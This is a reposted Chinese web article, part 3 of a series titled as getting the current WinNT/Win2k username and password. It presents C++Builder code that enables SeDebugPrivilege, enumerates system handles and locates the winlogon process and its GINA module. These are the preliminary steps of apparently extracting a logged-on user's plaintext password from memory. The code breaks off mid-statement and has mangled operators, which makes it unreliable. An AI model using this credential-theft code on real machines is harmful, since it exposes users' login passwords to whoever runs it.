获取WinNT/Win2k当前用户名和密码(3)

BOOL AddDebugPrivilege(void)
{
HANDLE Token;
TOKEN_PRIVILEGES TokenPrivileges, PreviousState;
DWORD ReturnLength = 0;
if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &Token))
if(LookupPrivilegeValue(NULL, "SeDebugPrivilege", &TokenPrivileges.Privileges[0].Luid))
{
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
return (AdjustTokenPrivileges(Token, FALSE, &TokenPrivileges,
sizeof (TOKEN_PRIVILEGES), &PreviousState, &ReturnLength));
}
return (FALSE);
}
//---------------------------------------------------------------------------
// 本文是ccrun(老妖)的一个朋友提供的代码.有问题或建议请致信:info@ccrun.com
// 欢迎光临C Builder 研究 http://www.ccrun.com
//---------------------------------------------------------------------------
// Note that the following code eliminates the need
// for PSAPI.DLL as part of the executable.
DWORD FindWinLogon(void)
{
#define INITIAL_ALLOCATION 0x100
DWORD dwRc = 0;
DWORD dwSizeNeeded = 0;
PVOID pvInfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, INITIAL_ALLOCATION);
// Find how much memory is required.
pfnNtQuerySystemInformation(0x10, pvInfo, INITIAL_ALLOCATION, &dwSizeNeeded);
HeapFree(GetProcessHeap(), 0, pvInfo);
// Now, allocate the proper amount of memory.
pvInfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwSizeNeeded);
DWORD dwSizeWritten = dwSizeNeeded;
if(pfnNtQuerySystemInformation(0x10, pvInfo, dwSizeNeeded, &dwSizeWritten))
? {
HeapFree(GetProcessHeap(), 0, pvInfo);
return (0);
}
DWORD dwNumHandles = dwSizeWritten / sizeof (QUERY_SYSTEM_INFORMATION);
if(dwNumHandles == 0)
{
// 本文转自 C Builder 研究 - http://www.ccrun.com/article.asp?i=612&d=1380t6
HeapFree(GetProcessHeap(), 0, pvInfo);
return (0);
}
PQUERY_SYSTEM_INFORMATION QuerySystemInformationP =
(PQUERY_SYSTEM_INFORMATION) pvInfo;
try
{
for(DWORD i=1; i<=dwNumHandles; i )
{
// "5" is the value of a kernel object type process.
if (QuerySystemInformationP->HandleType == 5)
{
PVOID pvDebugBuffer = pfnRtlCreateQueryDebugBuffer(0, 0);
if(pfnRtlQueryProcessDebugInformation
(QuerySystemInformationP->PID, 1, pvDebugBuffer) == 0)
{
PPROCESS_INFO_HEADER pihProcessInfoHeader =
(PPROCESS_INFO_HEADER)((DWORD)pvDebugBuffer 0x60);
DWORD dwCount = pihProcessInfoHeader->Count;
PPROCESS_INFO piProcessInfo = (PPROCESS_INFO)
((DWORD)pihProcessInfoHeader sizeof (PROCESS_INFO_HEADER));
// Form1->Memo1->Lines->Add(piProcessInfo->Name);
AnsiString strName = piProcessInfo->Name;
// if(strstr((char *)UpCase(*piProcessInfo->Name), "WINLOGON") != 0)
if(strName.UpperCase().Pos("WINLOGON") != 0)
{
DWORD dwTemp = (DWORD)piProcessInfo;
for (DWORD j=0; j<dwCount; j )
{
dwTemp = sizeof (PROCESS_INFO);
piProcessInfo = (PPROCESS_INFO)dwTemp;
strName = piProcessInfo->Name;
if(strName.UpperCase().Pos("NWGINA"

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有